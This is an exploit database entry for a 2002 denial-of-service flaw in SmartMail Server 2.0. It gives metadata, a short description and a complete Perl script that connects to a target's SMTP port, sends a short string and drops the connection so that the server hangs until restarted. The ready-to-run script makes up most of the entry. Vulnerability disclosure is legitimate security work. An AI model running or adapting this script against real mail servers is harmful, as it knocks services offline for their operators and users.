header-logo
Suggest Exploit
vendor:
SmartMail Server
by:
securma@caramail.com
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: SmartMail Server
Affected Version From: 2.0 Interim Build 83
Affected Version To: 2.0 Interim Build 83
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

SmartMail Server 2.0 Denial of Service Vulnerability

SmartMail Server is reported to be prone to a denial of service when a client is sending data and then closes the connection unexpectedly. SmartMail Server will need to be restarted to regain normal functionality.

Mitigation:

Restart the SmartMail Server to regain normal functionality.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6074/info

SmartMail Server is reported to be prone to a denial of service when a client is sending data and then closes the connection unexpectedly.

SmartMail Server will need to be restarted to regain normal functionality.

This issue was reported in SmartMail Server 2.0 Interim Build 83. It is not known if other versions are affected.


#!/usr/bin/perl -w
# greetz: marocit and #crack.fr (christal)
# securma@caramail.com
use Socket;
if (not $ARGV[0]) {
        print qq~
                Usage: sm.pl <host>
        ~;
exit;}

$ip=$ARGV[0];
print "SmartMail server 2.0 DoS\n\n";
print "Sending Exploit Code to host: " . $ip . "\n\n";
sendexplt("MASSINE");
sub sendexplt {
 my ($pstr)=@_;
        $target= inet_aton($ip) || die("inet_aton
problems");
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
 die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,25,$target)){
 select(S);
                $|=1;
 print $pstr;
 sleep 3;
         close(S);
 } else { die("Can't connect...\n"); }
}